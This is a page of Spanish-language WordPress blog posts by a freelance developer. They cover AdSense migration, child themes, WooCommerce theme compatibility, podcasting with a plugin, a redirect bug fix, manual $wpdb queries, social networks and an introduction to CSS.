Por eso, si usted está interesado en evaluar la adquisición de alguna criptomoneda, no dude en comunicarse conmigo y con gusto le daré una mano y lo aconsejaré sobre las distintas criptomonedas que hay en el mercado y las que están apareciendo.

Adsense en Sitios WordPress 2017

Etiquetas:

Categoría: Blog Información Wordpress

Seguir usando adsense en sitios wordpress

El plugin para wordpress de adsense de google dejará de estar disponible en mayo de el 2017. Es por ello que deberíamos realizar unos pequeños cambios para poder seguir usando adsense en nuestro sitio web.

1. Crea una copia de seguridad de tu sitio web de WordPress.
2. Desactiva el plugin oficial de AdSense para WordPress y retira los anuncios de AdSense que ya estén creados.
3. Elige una de las siguientes opciones para seguir mostrando anuncios de AdSense.
Opción 1: Mostrar anuncios con QuickStart
Conecta tu sitio web con un fragmento de código sencillo (código de anuncio a nivel de página) para que AdSense pueda incluir anuncios de forma automática. Cuando hayas añadido este código a tu página, solo tendrás que activar un interruptor en AdSense para que los anuncios empiecen a mostrarse automáticamente.
Debes usar otro complemento de WordPress para editar la sección <head> de la plantilla de tu sitio web de WordPress
Opción 2: Mostrar anuncios personalizados de AdSense
Inserta bloques de anuncios mediante los widgets de WordPress para crear y publicar tus propios bloques de anuncios.
Para ello, crea widgets de texto en WordPress y, a continuación, copia los códigos de tus bloques de anuncios y pégalos en dichos widgets.
4. Asegúrate de que tu sitio web cumpla las políticas de emplazamiento de anuncios de AdSense.
5. Retira por completo el plugin oficial de AdSense.
6. Opcional: Para seguir usando Google Search Console, comprueba que has verificado tu sitio web.

Si necesita alguna configuración extra o algún inconveniente realizando estos pasos, no dude en ponerse en contacto conmigo.

Crear Tema Hijo en WordPress

Etiquetas:

Categoría: Blog Wordpress

Creando Temas Hijos en WordPress

Muchas veces necesitamos realizar cambios a nuestro sitio wordpress. Si son pequeños cambios el problema no parecería ser mayor. Pero aún en estos cambios hay que tener una consideración especial.

Si modificamos el tema de wordpress en si mismo, cualquier nueva actualización sobreescribirá estos mismos. Es por ello que existen los child themes (temas hijos), así evitamos que los cambios anteriores se pierdan.

Pasos a seguir:

1 – Crear dentro de wp-content/themes una carpeta nueva con cualquier nombre. Lo ideal sería usar «nombredetemapadre-child» ya que podríamos tener varios temas y nos resultaría mas simple identificarlos después.

2 – Una vez creada la carpeta necesitamos crear un archivo dentro de la misma llamado «style.css» con el siguiente código dentro.

/*
Theme Name: Nombre Theme Hijo (Puede llevar espacios)
Theme URI: http://www.marioblock.com.ar
Version: 1.0
Description: Tema hijo de "Nombre Theme Padre" para hacer cambios sin riesgo alguno
Author: Mario Block
Author URI: http://www.marioblock.com.ar
Template: Nombre Theme Padre
Text Domain: Nombre Theme Hijo (minúsculas y sin espacios)
*/

@import url("../nombrethemepadre/style.css");

/*----------------- Empieza a añadir cambios aquí abajo -------------------------------*/

Con ese archivo archivo solo se podría subir tranquilamente y ya tendríamos un tema hijo. Pero el método @import no es recomendable para cargar estilos css, ya que consume mas recursos y por ende mas tiempo. La forma correcta de agregar estilos a nuestro tema es mediante las funciones provistas por wordpress.

Las funciones serían wp_enqueue_scripts action y wp_enqueue_style(). Ambas provistas por wordpress para encolar en forma correcta los scripts y los estilos.

Si tu tema padre contiene código css también deberás encolarlo. Seteando ‘parent-style’ como dependencia te asegurará que el css hijo se cargue después que este.  El código completo sería el siguiente.

<?php
function my_theme_enqueue_styles() {

    $parent_style = 'parent-style'; // This is 'twentyfifteen-style' for the Twenty Fifteen theme.

    wp_enqueue_style( $parent_style, get_template_directory_uri() . '/style.css' );
    wp_enqueue_style( 'child-style',
        get_stylesheet_directory_uri() . '/style.css',
        array( $parent_style ),
        wp_get_theme()->get('Version')
    );
}
add_action( 'wp_enqueue_scripts', 'my_theme_enqueue_styles' );
?>

Tu tema hijo esta listo para la activación. Ve a apariencia->temas y activa el creado anteriormente. Puedes llegar a necesitar salvar el menú nuevamente y las opciones del theme. Para ello ve a Apariencia->Menú y salvalo nuevamente, lo mismo para las opciones del tema padre.

Crear Theme compatible con WooCommerce

Categoría: Wordpress

Para crear un theme compatible con woocommerce partiendo de un theme básico vamos a necesitar tener varias previsiones. Las cuales serán detalladas a continuación con sus respectivos tips para hacerlo amigable y sencillo para el usuario con poco conocimiento de wordpress.

Los principales inconvenientes se dán en los diferentes layouts cuando queremos agregar las páginas de woocommerce en si mismo. Los sidebars pueden quedar en posiciones distintas o inclusive si nuestro theme es algo anticuado y esta realizado por desarrolladores con poca experiencia puede ser algo tedioso volverlo compatible.

Esto potencialmente puede afectar la pagina de compra, la pagina de producto y las paginas de taxonomias (categorias y tags) porque WooCommerce usa templates para mostrar sus propias paginas y es imposible conocer exactamente el taggeado de los temas usados. Otras paginas (checkout, carrito, cuenta) no son afectadas porque usan la misma plantilla de page.php

Hay dos caminos para resolver esto:

Usando Hooks (para usuarios avanzados o desarrolladores).

Usando la funcion woocommerce_content() dentro del mismo theme.

Usando woocommerce_content()

Esta solucion permite crear un nuevo template de pagina dentro de tu theme original y será usado por todas las taxonomias y tipos de post de WooCommerce. Si bien es una solución sencilla tiene un inconveniente en que será usado por todas las taxonomias y post types de woocommerce. Los desarrolladores usan por lo general los hooks para ello.

Para instalar esta plantilla de página:

Duplicamos page.php

Duplicando el archivo page.php y nombrandolo woocommerce.php. Este archivo será encontrado como: wp-content/themes/YOURTHEME/woocommerce.php.

Editar la página (woocommerce.php)

Abrimos el archivo con nuestro editor de texto favorito

Reemplazamos el ciclo

Necesitamos encontrar el ciclo. Usualmente comienza con

<?php if ( have_posts() ) :

y termina usualmente con:

<?php endif; ?>

Esto puede varia entre distintas plantillas de wordpress. Una vez que lo encontramos, lo borramos y agregamos en su lugar:

<?php woocommerce_content(); ?>

Esto usará el ciclo de WooCommerce en vez de el ciclo de wordpress. Salvar el archivo. Listo.

Usando hooks

El método hook es mas complicado que el anterior pero también es mas flexible. Esto es similar al método que usamos cuando creamos plantillas de wordpress. Es también el método que usamos para integrar las plantillas Twenty Ten a Twenty Sixteen.

Insertamos algunas pocas lineas en el archivo functions.php dentro de nuestra plantilla.

Primero desestimamos los wrappers de WooCommerce:

remove_action( 'woocommerce_before_main_content', 'woocommerce_output_content_wrapper', 10);
remove_action( 'woocommerce_after_main_content', 'woocommerce_output_content_wrapper_end', 10);

Despues enganchamos en nuestras propias funciones los wrappers para mostrar en la plantilla:

add_action('woocommerce_before_main_content', 'my_theme_wrapper_start', 10);
add_action('woocommerce_after_main_content', 'my_theme_wrapper_end', 10);

function my_theme_wrapper_start() {
  echo '<section id="main">';
}

function my_theme_wrapper_end() {
  echo '</section>';
}

Asegurarse que los tags matcheen con los que usamos en nuestra plantilla. Sino estamos seguros de que clases o IDs estamos usando miramos page.php para confirmar los tags elegidos.

Declaramos el soporte para WooCommerce

Una vez que nuestra plantilla soporta WooCommerce funcionalmente, deberiamos declarar esto en el codigo para ocultar en el Dashboard el mensaje que sale de que nuestra plantilla no tiene soporte para WooCommerce. Esto lo hacemos agregando el siguiente código en functions.php.

add_action( 'after_setup_theme', 'woocommerce_support' );
 function woocommerce_support() {
 add_theme_support( 'woocommerce' );
 }

Hacer Podcasting con WordPress

Etiquetas:

Categoría: Podcasts Sin categoría

Hacer Podcasting con WordPress

Para realizar podcasting con WordPress existen varias alternativas. Vamos a mostrar una de las más faciles de realizar y configurables por cualquier usuario. Necesitamos instalar el plugin Seriously Simple Podcasting. Una vez activado el plugin pasamos a la parte de la configuración.

podcast1En la pestaña general podemos setear algunas configuracines extras. El plugin generará un nuevo tipo de post en donde podemos ir cargando los nuestros.

podcast2En la segunda pestaña completamos con el titulo y el subtitulo que queremos. También agregamos el autor de acuerdo a nuestro gusto. Necesitamos si o si seleccionar una categoria ya que sino despues itunes no nos va a reconocer el podcast para su distribución. Las demás opciones las vamos completando de acuerdo a la información que le querramos añadir.

podcast3 En el tab de seguridad yo aconsejo dejarlo como está, ya que si le agregamos seguridad los lectores de rss no lo van a leer y nos vamos a ver perjudicados si lo que queremos es que se masifique su uso. Es altamente aconsejable completar la información si queremos mantener una privacidad en nuestro podcast.

Las ultimas dos secciones de configuración las podemos dejar como están.

podcast4 podcast5

 

Despues lo que tenemos que hacer es ir a itunes, File >> Subscribe to Podcast y agregar la url que nos devuelve el plugin. Deberia ser algo parecido a http://www.example.com/feed/podcast en donde deberias reemplazar example.com con el nombre de tu dominio. Una vez realizado esto buscará el feed y lo mostrará. Si todo está bien estás listro para enviar el feed a iTunes.

Para submitear el podcast to iTunes, tu necesitas bajar e instalar la ultima version de iTunes en tu computadora. Despues, lanzar iTunes y hacer click en la tienda de iTunes (boton arriba a la derecha de la pantalla).

iTunes accederá a la tienda. Hacer click en el menu Podcasts, y entonces bajar un poco hasta encontrar la version de links rapidos podcasts. Deberias ver un link para enviar un podcast.

submit-podcast-itunes

Esto abrirá el proceso de enviar un Podcast. Necesitarás un Apple ID para enviarlo al directorio de iTunes. Si no estas logueado, iTunes te mostrará el login para hacerlo.

La primer cosas que necesitarás es la URL del feed. Debería ser algo asi http://example.com/feed/podcast

Dado de que estas usando un plugin, tu feed necesitará incluir tags requeridos por iTunes para podcasts.

Despues de enviarlo, iTunes lo encolará para revisarlo, si es aprovado por iTunes, este aparecera en el directorio de iTunes y serás notificado via email.

 

Solución a Redirección de páginas de primer nivel

Etiquetas:

Categoría: Wordpress

WordPress muchas veces nos trae inconvenientes que son difíciles de diagnosticar sin tener en cuenta la forma de que se realizo el theme. Para eso tenemos que tener en cuenta muchas consideraciones y es en base a eso que vamos a comentar las soluciones a las redirecciones de paginas de primer nivel.

No se hablará de todo lo relacionado a redirecciones ya que es un tema muy profundo y no es el objetivo de este post.

Cuando nos encontramos con que las redirecciones de wordpress funcionan correctamente pero solo en ciertas paginas/posts tenemos que tener especial cuidado de los plugins que tenemos instalados.

En nuestro caso nos pasó que las paginas linkeaban correctamente cuando estas eran hijas de alguna otra. Pero cuando queríamos acceder a paginas de primer nivel la redirección iba directamente al home.

Los pasos que se hicieron para encontrar la solucion fueron los siguientes:

  • Cambiar a algún template default para ver si el problema persiste. En nuestro caso el problema era el theme propiamente dicho.
  • Habilitar el debug en wp-config para ver si aparecía algún nuevo error.
  • Verificar que functions.php este bien escrito y sea 100% acorde a los standares de wordpress
  • Prestar especial atencion a los custom post types y custom taxonomies generados en functions.php (https://codex.wordpress.org/Function_Reference/register_taxonomy)
  • En nuestro caso el error se dio porque registraban una taxonomía que era reservada para wordpress (year)
  • Cambiando esto y regenerando nuevamente los permalinks se soluciono el problema

Espero que la solución dada le sea de utilidad a algún desarrollador mas.

La importancia de las redes sociales

Etiquetas:

Categoría: Redes Sociales

Al día de hoy las redes sociales han cobrado mucha importancia, y han adquirido un valor fundamental en nuestras vidas. Antes cuando queriamos conseguir trabajo con el CV bastaba y uno no necesitaba tener otra cosa organizada y bien redactada. Con la llegada de estas redes esto ha cambiado; hoy por hoy los encargados de recursos humanos miran mas allá de un CV y ponen especial énfasis en las redes sociales. Es por eso que la importancia de las redes sociales es un tema que hay que tratarlo con cuidado y tratar de sacar el mayor provecho posible a todo este nuevo sistema.

Empecemos por casos concretos: se ha sabido de gente que no las han contratado por tener fotos en donde aparecían en mal estado o donde publicaban posts/tweets desafiantes y con un lenguaje no acorde a un profesional. Es así y hoy tenemos que tener mucho cuidado en las cosas que publicamos si queremos que una empresa nos contrate; sino tenemos que tener mayor cuidado a la hora de saber quien puede ver eso. Si solo nuestros amigos o todo el mundo.

Mas allá de eso las redes sociales han cobrado mucha importancia a la hora de mostrar nuestros desarrollos, como así también la unión de todas estas para que juntas puedan tener un beneficio aún mayor. Para ello tenemos que estar al día de las nuevas redes sociales que van cobrando protagonismo en esta carrera que tienen para ver cual es la mejor. Existen 5 redes sociales que no las podemos dejar de lado y estas son

  • Linkedin: Red social para profesionales principalmente donde nuestro CV esta online y podemos contactarnos con gente que tienen nuestros mismos intereses.
  • Facebook: La mayor red social en donde se comparte todo. Podemos profesionalizar nuestro perfil y adecuarlo a lo que queremos mostrarle a nuestros clientes.
  • Twitter: La mayor red social de microblogging. Está cobrando mucha importancia debido a su fácil uso y eficiencia.
  • Pinterest: Nueva red social, la cual está basada en imágenes. Ideal para nuestro portfolio.
  • Google+: La red social de google, en donde tenemos muchísimas opciones para compartir, todavía no esta teniendo el éxito que todos creíamos iba a tener.

Me puedo estar olvidando de alguna pero es imprescindible que a la hora de crear nuestros perfiles podamos conectarlos y entre todos obtener una valiosa herramienta, para así poder captar mayor cantidad de clientes. social-networking-users-SeoCustomer3 Estos datos son basados en consultoras en donde informan de la cantidad real de usuarios de estas redes sociales. Podemos estar de acuerdo o no en la importancia de estas redes sociales, pero estas llegaron para quedarse por un buen tiempo y no podemos desaprovechar esto a la hora de crear nuestro perfil y de no integrarla entre ellas. En otros posts hablaré de como integrar todas estas redes sociales y sacarle nuestro mayor provecho a la hora de desarrollar un producto o armar nuestro CV y dejar público aquello que realmente queremos que se vea.

Consejo para desarrolladores: Ofrecerle a nuestro cliente la forma de integrar estas redes sociales a vuestro sitio y sino tiene ninguna red social ofrecerle un combo en donde su negocio se beneficiará con el uso de estas. Hoy existen herramientas para integrar todas estas redes sociales y poderlas manejar desde un mismo lugar.

Agregar posts manualmente en wordpress

Categoría: Wordpress

Es de común pedido por parte de los clientes el agregar varias clases de posts en una misma página. Para ello se utiliza la sentencia «query_posts($args)» o sino «$query = new WP_Query($args)» donde «$args» son los argumentos pasados a las funciones wordpress para estas queries o consultas. Pero esto suele tener algunos inconvenientes y a veces necesitamos agregar posts manualmente en wordpress.

También se suele utilizar algún orden específico, fecha, id, custom field, etc; pero desde hace un tiempo se utilizan algunos plugins para ordenarlos en forma manual, el cual utilizan «drag & drop» y así le dá al usuario un nivel mas de customización.
Pero estos plugins por lo general agregan funciones y filtros que pueden bloquear algunos ordenes utilizados en otros lugares.

Es por eso que es siempre útil conocer la sintáxis de wordpress a la hora de realizar queries manualmente. Es algo tedioso tener que usar queries manuales ya que si en alguna actualización de wordpress cambia la base de datos esto dejará de funcionar. Pero esto nos puede sacar de un apuro en caso de que un cliente asi lo requiera.


global $wpdb;
global $post;
 $querystr = "
    SELECT * 
    FROM $wpdb->posts
    WHERE $wpdb->posts.post_status = 'publish' 
    AND $wpdb->posts.post_type = 'sponsor'
    ORDER BY RAND()
	LIMIT 4
 ";
$pageposts = $wpdb->get_results($querystr, OBJECT);


  if ($pageposts):
   global $post; 
 foreach ($pageposts as $post): 
     setup_postdata($post); 
 the_title(); 	

endforeach;
endif;

>

Como vemos en el ejemplo lo que estamos solicitando es obtener 4 posts random que sean del custom post type «sponsor». Despues mostramos solo el título como ejemplo pero podemos mostrar lo que quisieramos.

Logo Wordpress

Experiencia WordPress

Etiquetas:

Categoría: Wordpress

WordPress es uno de los CMS que más se ha desarrollado en los ultimos 2 años. Esto se debe a su excelente calidad y a la facilidad de crear nuevos sitios en poco tiempo.

Particularmente yo empece a usar hace algunos años ModX pero debido a la dificultad que presentaba el sistema, los clientes fueron preguntando sino existia una forma mas simple de crear contenido y demás. Cabe destacar que modx es muy potente y se pueden hacer cosas realmente geniales.

Logo WordPress

Fue ahí cuando empecé a usar wordpress. Al principio fue creado solo para blogs, pero dada la facilidad que tenía la gente de escribir contenido, este empezó a obtener popularidad y la demanda de sitios con wordpress fue creciendo.

En ese momento fue cuando el equipo wordpress empieza a agregarle funcionalidad al CMS, y el mundo del desarrollo comenzó a crear plugins y themes con mas funcionalidad. Actualmente estamos en la version 3.5 y cada vez estan largando versiones mas rapido. Para fin de año la version 4.0 estaría con nosotros ya.  (No puedo imaginar todo lo que le pueden llegar a agregar, ya que esta bastante bien ahora).

El gran punto flojo en wordpress es que al haber tanta gente escribiendo plugins y demás, y no todos escriben código de la misma forma ello se torne tedioso en cuanto a la compatibilidad de varios plugins instalados en un mismo sitio.

Varias empresas están empezando a contratar gente con experiencia en wp, ya que si bien es un CMS y no es complicado, uno necesita de experiencia a la hora de diseñar la programacion del mismo. Uno se tiene que sentar a pensar y sacar conclusiones de cuál sería la mejor forma de encarar un wordpress.

Hoy hay muchas diferencias entre un sitio wp bien desarrollado y uno que se empezo a codificar desde el principio. Los casos mas notorios se dan cuando uno tiene un sitio web en donde usamos los post con categorias para todos y eso se puede cambiar tambien por custom post types con taxonomias.

Otro punto a la hora de desarrollar un sitio es que tenemos que pensar si vamos a tener usuarios con distintos roles. Esto tiene que ser bien pensado de antemano y no ir probando varios plugins, ya que despues la facilidad de uso despues se puede ver opacada.

Wp tambien sirve para tiendas online de todos los tipos, hay varios plugins para ello, algunos mas potentes que otros; igual para mi esta parte todavia no esta bien madura con los plugins que hay actualmente. Algunos plugins se están desarrollando y en breve van a estar online para el uso de estos.

WordPress es hoy sin lugar a duda el mejor CMS en cuanto a flexibilidad, facilidad de uso y costo. Por eso es que cada vez mas gente esta girando hacia este CMS, aprenderlo y poder ofrecer sus servicios. Muchos desarrolladores lo ven con malos ojos al tener un sitio web con un CMS armado y no a medida, pero para sitios de chicos a medianos es una buena opción. Con el agregado de plugins wp puede ser una herramienta altamente calificada a la hora de realizar sitios webs.

Introduccion Css

Etiquetas:

Categoría: CSS

El nombre hojas de estilo en cascada viene del inglés Cascading Style Sheets, del que toma sus siglas. CSS es un lenguaje usado para definir la presentación de un documento estructurado escrito en HTML o XML2 (y por extensión en XHTML). El W3C (World Wide Web Consortium) es el encargado de formular la especificación de las hojas de estilo que servirán de estándar para los agentes de usuario o navegadores.
La idea que se encuentra detrás del desarrollo de CSS es separar la estructura de un documento de su presentación.
La información de estilo puede ser adjuntada como un documento separado o en el mismo documento HTML. En este último caso podrían definirse estilos generales en la cabecera del documento o en cada etiqueta particular mediante el atributo «<style>».

CSS tiene una sintaxis muy sencilla, que usa unas cuantas palabras claves tomadas del inglés para especificar los nombres de sus selectores, propiedades y atributos.
Una hoja de estilos CSS consiste en una serie de reglas. Cada regla consiste en uno o más selectores y un bloque de estilos con los estilos a aplicar para los elementos del documento que cumplan con el selector que les precede. Cada bloque de estilos se define entre llaves, y está formado por una o varias declaraciones de estilo con el formato propiedad:valor;.3
En el CSS, los selectors marcarán qué elementos se verán afectados por cada bloque de estilo que les siga, pudiendo afectar a uno o varios elementos a la vez, en función de su tipo, nombre (name), ID, clase (class), posición dentro del Document Object Model, etcétera.4
Abajo puede verse un ejemplo de una parte de una hoja de estilos CSS:

selector [, selector2, ...] [:pseudo-class][::pseudo-element] {
propiedad: valor;
[propiedad2: valor2;
...]
}
/* comentarios */

Debido al avance de los distintos navegadores webs al principio las reglas eran limitadas, pero esto se fue solucionando con el advenimiento de nuevos browsers con mayor poder de procesamiento. Es por eso que en estos momentos (2012) vamos por la version 3 de css.

En los siguientes articulos iremos agregando recomendaciones a la hora de desarrollar un css. Hay ciertas pautas y reglas que uno debe cumplir para que el diseño de la pagina web sea cross browser (visible de la misma forma en la mayoria de los browsers conocidos).

Fuente: http://es.wikipedia.org/wiki/Hojas_de_estilo_en_cascada

Páginas

© Copyright 2020. Todos los derechos reservados Funciona con